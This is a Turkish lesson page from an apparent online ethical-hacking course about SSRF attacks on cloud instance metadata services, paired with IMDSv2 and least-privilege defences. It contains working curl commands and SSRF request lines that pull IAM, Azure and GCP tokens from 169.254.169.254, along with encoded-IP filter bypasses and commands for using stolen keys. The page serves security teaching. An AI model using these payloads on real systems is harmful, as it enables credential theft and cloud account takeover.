Ethical Hacking Academy · Ders

Üst Veriler ve SSRF

Buluta özgü saldırılar

4. ders / 413 adım

Üst Veriler ve SSRF, CoddyKit'te ücretsiz bir Ethical Hacking Academy dersidir. Bu, 4 dersinin 4. dersidir. Aşağıdan dersin tamamını ücretsiz okuyabilir, sonra tarayıcıda yerleşik kod editörü ve 7/24 yapay zeka koçu ile uygulamalı olarak pratik yapabilirsin. Bu, Ethical Hacking Academy öğrenme yolunun bir parçasıdır ve ilerlemeniz web ve CoddyKit uygulaması arasında senkronize olur. Ethical Hacking Academy kursu toplamda 4 dersten oluşur.

Instance Metadata Service

Her bulut VM'si kendisi hakkında bilgi edinmek için özel bir dahili uç noktaya sorgu gönderebilir: Instance Metadata Service (IMDS). Kritik olarak, örneğe bağlı rolün geçici kimlik bilgilerini de sağlayabilir.

  • AWS / GCP / Azure meta verileri 169.254.169.254 adresinde sunar
  • Bu adrese yalnızca örneğin içinden erişilebilir
  • Yerel işlemler için kimlik doğrulaması gerekmez

Bu kolaylık, SSRF ile birleştiğinde bir silaha dönüşür.

AWS Meta Verilerini Okuma (IMDSv1)

Eski IMDSv1'de tek bir GET isteği, rol kimlik bilgileri de dahil olmak üzere meta verileri döndürür. Jeton gerekmez.

Bir uygulamada SSRF bulunduğunda IMDSv1'i tehlikeli yapan tam olarak budur.

# List roles attached to the instance
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Retrieve the temporary credentials for a role
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/app-role

SSRF Nedir

Sunucu Taraflı İstek Sahteciliği (SSRF), saldırganın bir sunucuyu kendi adına HTTP istekleri göndermeye kandırdığı bir güvenlik açığıdır. Sunucu, saldırganın doğrudan erişemediği yerlere açılan bir vekil sunucuya dönüşür.

  • Sunucunun alıp getirdiği bir URL parametresi
  • Bir web kancası, PDF oluşturucu veya görsel boyutlandırma özelliği
  • Kullanıcı tarafından sağlanan bir URL alan her şey

Bulutta klasik SSRF hedefi meta veri uç noktasıdır.

SSRF Meta Verilerle Buluşuyor

Ölümcül birleşim şudur: SSRF içeren bir uygulama, saldırganın sunucuyu 169.254.169.254 adresine yönlendirmesine izin verir. Sunucu, örneğin IAM kimlik bilgilerini alır ve bunları geri döndürür.

Saldırgan artık bulut kimlik bilgilerini elinde tutar; bu çoğu zaman hesabın tamamen ele geçirilmesinin başlangıcıdır.

# Vulnerable endpoint fetches any URL the user supplies
GET /fetch?url=http://example.com/image.png

# Attacker redirects it to the metadata service
GET /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/app-role

Çalınan Kimlik Bilgilerini Kullanma

Meta veri yanıtı bir erişim anahtarı, gizli anahtar ve oturum jetonu içerir. Saldırgan bunları dışa aktarır ve hemen örnek rolü olarak hareket eder.

Buradan sonra izinleri listeler ve ayrıcalık yükseltme yolları arar.

export AWS_ACCESS_KEY_ID=ASIA...
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...

# Confirm the stolen identity
aws sts get-caller-identity

Savunma Olarak IMDSv2

AWS, SSRF'nin etkisini azaltmak için IMDSv2'yi kullanıma sundu. Önce bir HTTP PUT isteğiyle alınan oturum jetonunu zorunlu kılar; çoğu SSRF yöntemi bunu gerçekleştiremez (yalnızca GET yaparlar).

IMDSv2'yi zorunlu kılmak ve düşük bir atlama sınırı belirlemek, SSRF yoluyla meta veri hırsızlığını büyük ölçüde azaltır.

# IMDSv2: first PUT to get a session token
TOKEN=$(curl -X PUT 'http://169.254.169.254/latest/api/token' \
  -H 'X-aws-ec2-metadata-token-ttl-seconds: 21600')

# Then GET using that token
curl -H "X-aws-ec2-metadata-token: $TOKEN" \
  http://169.254.169.254/latest/meta-data/

Azure ve GCP Meta Verileri

Diğer sağlayıcılar da kendilerine özgü ayrıntılarla meta verileri sunar. Her ikisi de özel bir üst bilgi gerektirir; bu da başlı başına küçük bir SSRF azaltımıdır.

  • Azure, Metadata: true gerektirir
  • GCP, Metadata-Flavor: Google gerektirir
# Azure: fetch a managed-identity access token
curl -H 'Metadata: true' \
  'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/'

# GCP: fetch a service-account token
curl -H 'Metadata-Flavor: Google' \
  'http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token'

SSRF Atlatma Teknikleri

Savunma ekipleri çoğu zaman 169.254.169.254 adresini engelleme listesine ekler. Saldırganlar, basit filtreleri alternatif IP kodlamaları ve yönlendirmelerle aşar.

  • Ondalık IP: 2852039166
  • Aynı adresin sekizlik/onaltılık kodlamaları
  • Bir ada, meta veri IP adresine çözümlenecek şekilde DNS yeniden bağlama
  • İsteği meta veri URL'sine yönlendiren açık yönlendirmeler

Sağlam savunmalar, ham dizeyi değil, çözümlenen IP adresini doğrulamalıdır.

# The metadata IP in alternate notations (all 169.254.169.254)
http://2852039166/latest/meta-data/
http://0251.0376.0251.0376/latest/meta-data/

Diğer SSRF Hedefleri

Meta veriler en bilinen hedef olsa da SSRF daha fazla dahili kaynağa ulaşabilir:

  • localhost'a bağlı dahili yönetim panelleri ve gösterge tabloları
  • Dahili veritabanları ve önbellekler (Redis, Elasticsearch)
  • Kubernetes API sunucusu ve kubelet uç noktaları
  • Dışarıya sunulmayan diğer mikro hizmetler

SSRF, güvenilir bir konumdan ağ çevresini etkili bir şekilde deler.

Zincire Karşı Savunma

SSRF'den meta verilere uzanan zinciri kırmak, katmanlı bir savunma gerektirir:

  • IMDSv2'yi zorunlu kılın ve meta veri atlama sınırını 1 olarak belirleyin
  • Giden URL'leri doğrulayın ve getirme özelliklerinde izin verilenler listesine ekleyin
  • DNS çözümlemesinden sonra yerel bağlantı ve özel IP aralıklarına yönelik istekleri engelleyin
  • Çalınan kimlik bilgilerinin etkisini sınırlamak için örnek rollerine en az ayrıcalık verin

En az ayrıcalıklı roller, başarılı bir hırsızlığın bile çok az sonuç vermesini sağlar.

Yalnızca Yetkiniz Olanları Test Edin

SSRF testi, tasarımı gereği hassas dahili sistemlere ulaşabilir. Disiplinli olun:

  • Hedef ana bilgisayarın ve bulut hesabının kapsam dahilinde olduğunu doğrulayın
  • Çalışma kapsamı dışındaki sistemlere sıçramayın
  • Kimlik bilgilerine erişiminizi kanıtladıktan sonra durun ve bildirin

Meta verilere ulaşmanın etkisi büyüktür; bunu dikkatle gösterin, çalınan anahtarlarla kontrolsüz işlemler yapmayın.

Hızlı Kontrol

IMDSv2'yi zorunlu kılmak, SSRF tabanlı kimlik bilgisi hırsızlığına karşı savunmaya neden yardımcı olur?

Özet: Meta Veriler ve SSRF

Buluta özgü en etkili saldırı zincirini öğrendiniz.

  • Meta veri hizmeti, 169.254.169.254 adresinde örnek rolü kimlik bilgilerini sağlar
  • SSRF, saldırganın sunucuya bu uç noktayı aldırmasını sağlar
  • Çalınan geçici kimlik bilgileri hesabın ele geçirilmesini mümkün kılar
  • IMDSv2, PUT tabanlı bir jeton gerektirerek çoğu SSRF saldırısını engeller
  • URL izin listesi, IP doğrulaması ve en az ayrıcalıklı rollerle savunma yapın

Bulut Sızma Testi tamamlandı. Sıradaki kurs: Hata Ödülü Avcılığı.

Başlamak ücretsiz

Yapay zeka eğitmeniyle Ethical Hacking Academy öğren — ücretsiz

Tarayıcında gerçek kod yaz ve çalıştır, 7/24 yapay zeka eğitmeninden anında yardım al; web'de ya da uygulamada kaldığın yerden devam et.

Kurslar
31
Dersler
111

Sıkça Sorulan Sorular

“Üst Veriler ve SSRF” dersi ücretsiz mi?

Evet — “Üst Veriler ve SSRF” dersin tüm metni burada web'de ücretsiz olarak okunabilir. Etkileşimli olarak pratik yapmak (yerleşik kod editörü ve 7/24 yapay zeka koçu) ve Ethical Hacking Academy kursunun geri kalanını açmak için CoddyKit PRO'ya yükselt. Ethical Hacking Academy kursu toplamda 4 dersten oluşur.

“Üst Veriler ve SSRF” dersinde ne öğreneceğim?

Buluta özgü saldırılar Ethical Hacking Academy ile uygulamalı kodu tarayıcıda doğrudan çalıştırarak pratik yaparsın ve 7/24 yapay zeka koçu dersi çalışırken sorularını yanıtlar.

Ethical Hacking Academy öğrenmeye başlamak için deneyim gerekli mi?

Önceden deneyim gerekmez. CoddyKit'te Ethical Hacking Academy, başlangıçtan ileri seviyeye kadar yapılandırıldığı için buradan başlayabilir veya başından başlayıp kendi hızında ilerleme yapabilirsin. Bu, 4 dersinin 4. dersidir.

“Üst Veriler ve SSRF” dersi ne kadar sürer?

Çoğu CoddyKit dersi yaklaşık 5–10 dakika sürer. Her biri kısa ve etkileşimli olduğu için sabit ilerleme yaparsın ve web ile uygulama arasında tam olarak bıraktığın yerden devam edebilirsin.

Bu Ethical Hacking Academy dersinde kod yazıp çalıştırabilir miyim?

Evet. Her Ethical Hacking Academy dersi yerleşik bir kod editörü içerir, bu sayede tarayıcıda gerçek kod yazıp çalıştırabilir ve anlık yapay zeka geri bildirimi alırsın — yerel kurulum gerekli değildir.

Bu kursun tüm dersleri

  1. Bulut Saldırı Yüzeyi
  2. IAM Yapılandırma Hataları
  3. S3 ve Depolama Açığı
  4. Üst Veriler ve SSRF
← Ethical Hacking Academy Sayfasına Dön